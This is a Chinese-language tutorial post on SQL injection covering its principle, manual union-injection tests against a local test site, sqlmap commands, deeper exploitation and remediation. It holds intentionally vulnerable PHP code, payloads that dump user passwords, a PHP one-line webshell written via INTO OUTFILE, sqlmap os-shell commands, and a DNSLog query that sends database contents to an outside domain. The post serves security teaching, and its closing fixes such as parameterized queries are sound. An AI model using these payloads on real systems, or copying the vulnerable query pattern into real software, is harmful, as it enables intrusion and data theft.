工作多年后，我打算将Web漏洞做一个整理记录，一方面方便自己，另一方面方便想要学习或转行网络安全行业的小伙伴，从本文开始，我将从漏洞原理、漏洞测试、漏洞修复等方面详细讲解Web系列漏洞。

1.SQL注入漏洞原理

SQL注入漏洞，就是通过把SQL命令插入到URL地址、Web表单提交或页面请求的查询字符串中，最终达到欺骗服务器执行恶意的SQL 命令。漏洞成因是程序没有对用户输入的内容进行安全检查，直接代入数据库进行查询，导致了sql注入的发生。

SQL注入漏洞包括：union注入、boolean注入、报错注入、时间盲注、堆叠查询注入、二次注入、宽字节注入、cookie注入、base64注入、XFF注入等。

2.SQL注入漏洞测试

2.1SQL注入漏洞发现

判断是否存在注入漏洞，使用单引号报错， and 1=1页面正常，and 1=2页面不正常，则判断存在sql注入漏洞。

2.2SQL注入漏洞手动测试

上面说过SQL注入漏洞分了很多种类，受限于篇幅，这里只以union注入举例，其他将附上链接，感兴趣的小伙伴可以自行查看。

（1）union注入，又称联合注入，它是利用union和前面的一条SQL语句拼接，并构造其列数与前面的SQL语句列数相同。

A.判断是否存在漏洞：（www.test.com为本地搭建环境）

http://www.test.com/web/union.php?id=1

http://www.test.com/web/union.php?id=1'

http://www.test.com/web/union.php?id=1 and 1=1

http://www.test.com/web/union.php?id=1 and 1=2

B.查询字段数量

http://www.test.com/web/union.php?id=1 order by 3

当id=1 order by 3时，页面返回与id=1相同的结果；而id=1 order by 4时不一样，故字段数量是3。

 C.查询SQL语句插入位置

http://www.test.com/web/union.php?id=-1 union select 1,2,3

可以看到2,3位置可以插入SQL语句。

D.获取当前数据库库名

2位置修改为：database()

http://www.tianchi.com/web/union.php?id=-1 union select 1,database(),3

源码：

<?php
$con=mysqli_connect("localhost","root","root","security");
mysqli_set_charset($con,'utf8');
if(!$con){
	echo "Connect failed : ".mysqli_connect_error();
}
 
$id=$_GET['id'];
$result=mysqli_query($con,"select * from users where id=".$id );
$row=mysqli_fetch_array($result);
echo $row['username']." : ".$row['password'];
?>

union注入详解：https://blog.csdn.net/SouthWind0/article/details/82913183

（2）Boolean注入：构造SQL判断语句，通过查看页面的返回结果来推测哪些SQL判断条件是成立的，以此来获取数据库中的数据。

 Boolean注入详解：https://blog.csdn.net/SouthWind0/article/details/82917798

（3）报错注入：输入'等字符，SQL语句报错，程序直接将错误信息输出到了页面上，就可以尝试利用报错注入来获取数据。常用到的函数：updatexml() 、extractvalue()、exp()、floor()等。

报错注入详解：https://blog.csdn.net/SouthWind0/article/details/82924149

（4）时间盲注：利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用，通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。

时间盲注详解：https://blog.csdn.net/SouthWind0/article/details/82926845

（5）堆叠查询注入：堆叠查询可以执行多条SQL语句，语句之间以分号(;)隔开。而堆叠查询注入攻击就是利用此特点，在第二条语句中构造自己要执行的语句。

堆叠查询注入详解：https://blog.csdn.net/SouthWind0/article/details/82929895

（6）二次注入：攻击者构造的恶意数据存储到数据库后，恶意数据被读取并进入到SQL查询语句所导致的注入。

二次注入详解：https://blog.csdn.net/SouthWind0/article/details/82931871

（7）宽字节注入：id=1’时并没有报错，但多了一个转义符，反斜杠，在地址后先加%df，再加单引号，因为反斜杠的编码是%5c，而GBK编中，%df%5c是繁体字的“連”，单引号成功逃逸。再使用注释符来注释后面多余的单引号。

宽字节注入详解：https://blog.csdn.net/SouthWind0/article/details/83342847

（8）cookie注入：指的是针对cookie数据进行注入。

cookie注入详解：https://blog.csdn.net/SouthWind0/article/details/83343914

（9）base64注入是针对传递的参数被base64加密后的注入点进行注入。这种方式常用来绕过一些WAF的检测。

Base64注入详解：https://blog.csdn.net/SouthWind0/article/details/83344880

（10）XFF注入：指的是针对X-Forwarded-For进行注入，X-Forwarded-For简称XFF头，它代表了客户端的真实IP，通过修改他的值就可以伪造客户端IP。

 XFF注入详解：https://blog.csdn.net/SouthWind0/article/details/83348706

2.3SQL注入漏洞自动化测试

在真实的测试环境中，一般都是使用自动化工具进行测试SQL注入，sqlmap是当前安全工程师最喜欢使用的SQL注入自动化工具，它的基本用法如下：

测试GET型：

（1）判断是否存在注入

sqlmap.py -u “http://xx.com/index.php?id=1”

（2）获取所有数据库

sqlmap.py -u “http://xx.com/index.php?id=1” --dbs

（3）获取数据库中的表名

sqlmap.py -u “http://xx.com/index.php?id=1” -D security --tables

（4）获取表中的字段名

sqlmap.py -u “http://xx.com/index.php?id=1” -D security -T users --columns

（5）获取字段的内容

sqlmap.py -u “http://xx.com/index.php?id=1” -D security -T users -C username,password --dump

常用命令：

列出所有用户：sqlmap.py -u “http://xx.com/index.php?id=1” --users

获取用户密码：sqlmap.py -u “http://xx.com/index.php?id=1” --passwords

获取当前网站数据库名称：

sqlmap.py -u “http://xx.com/index.php?id=1” --current-db

测试POST型：测试POST型请求报文、Cookie信息等。

（1）cookie注入，猜解表

sqlmap.py -u “http://xx.com/index.php” --cookie “id=1” --level 2 -D security --tables

探测等级：--level，一共5个等级，可以不加level，默认为1。为2时会测试cookie，为3时会测试User-Agent/Referer。总之为了保证全面性，建议使用高的level。

（2）判断文本请求是否存在注入

sqlmap.py -r 1.txt

2.4SQL注入漏洞深层次利用

（1）手动利用

最常见的用法是利用SQL注入向服务器写入webshell，网站路径可以通过phpinfo()页面信息、系统信息、以及数据包泄露绝对路径获得。写入一句话利用（注意写入目录需要有权限），其中x为php文件名：

select '<?php @eval($_POST[cmd]);?>' into outfile '/var/www/html/x';

如下所示：

http://xx.test/test/union.php?id=-1%20union%20select%201,2,%27%3C?php%20@eval($_POST[cmd]);?%3E%27%20into%20outfile%20%27/var/www/html/test/shell.php%27

（2）利用sqlmap

反弹一个osshell：

python sqlmap.py -d "mysql://root:[email protected]:3306/security" --os-shell

执行操作系统命令：

python sqlmap.py -d "mysql://root:[email protected]:3306/security" --os-cmd=OSCMD

数据库提权：--priv-esc

获取数据库shell：--sql-shell   

注意：MySQL读写文件的条件限制，SQLMAP获取os-shell的需要文件写入操作：
（1）、MySQL服务默认以mysql用户权限启动，并没有危险目录（/usr/lib64/mysql/plugin[root 755]、/var/www/html[root 755]、/var/spool/cron[root 700]、/root/.ssh[root 700]等）下的文件写入权限。
（2）、MySQL 5.6.34版本以后的secure_file_priv参数默认值为NULL或指定的/var/lib/mysql-files，即禁止在危险目录写入。

（3）DNSLog外带

对于SQL盲注（布尔盲注、时间盲注），以及只有DNS出网的SQL注入，我们可以利用DNSLog来获取信息。作为攻击者，提交注入语句，让数据库把需要查询的值和域名拼接起来，然后发生DNS查询，我们只要能获得DNS的日志，就得到了想要的值。所以我们需要有一个自己的域名，然后在域名商处配置一条NS记录，然后我们在NS服务器上面获取DNS日志即可。

mysql通常会利用内置函数load_file()来完成DNSLOG，load_file()不仅能够加载本地文件，同时也能对诸如\\www.test.com这样的URL发起请求。
通过show variables like '%secure%';查看load_file()可以读取的磁盘。
A.当secure_file_priv为空，就可以读取磁盘的目录。
B.当secure_file_priv为G:\，就可以读取G盘的文件。
C.当secure_file_priv为null，load_file就不能加载文件。
通过设置my.ini来配置。secure_file_priv=""就是可以load_flie任意磁盘的文件。

举例：select load_file(concat('\\\\',(select database()),'.mysql.uj4j2o.dnslog.cn\\abc'));

注意：load_file函数在Linux下是无法用来做dnslog攻击的，因为在这里就涉及到Windows的一个小Tips——UNC路径。

3.SQL注入漏洞修复

（1）建议不要直接拼接SQL语句，而应该使用预编译的方式进行参数化查询，这是解决此漏洞的根本方法。

正确写法：select * from user where name = #{name};//这种底层会解析成预编译语句 select * from user where name = ?

错误写法：select * from user where name = ${name};

（2）对用户的输入进行检验过滤，过滤危险字符，如：;、'、"、()、,、\、--+、#、and、or、union、select、where、limit、group、by、hex、substr。此种方法存在缺陷，一方面可能会影响业务，另一方面可能会存在绕过。

（3）为每个应用使用单独的、权限有限的数据库连接。

（4）机密信息应该加密，秘钥信息分开存放，这样即使数据泄露，攻击者也无法解密。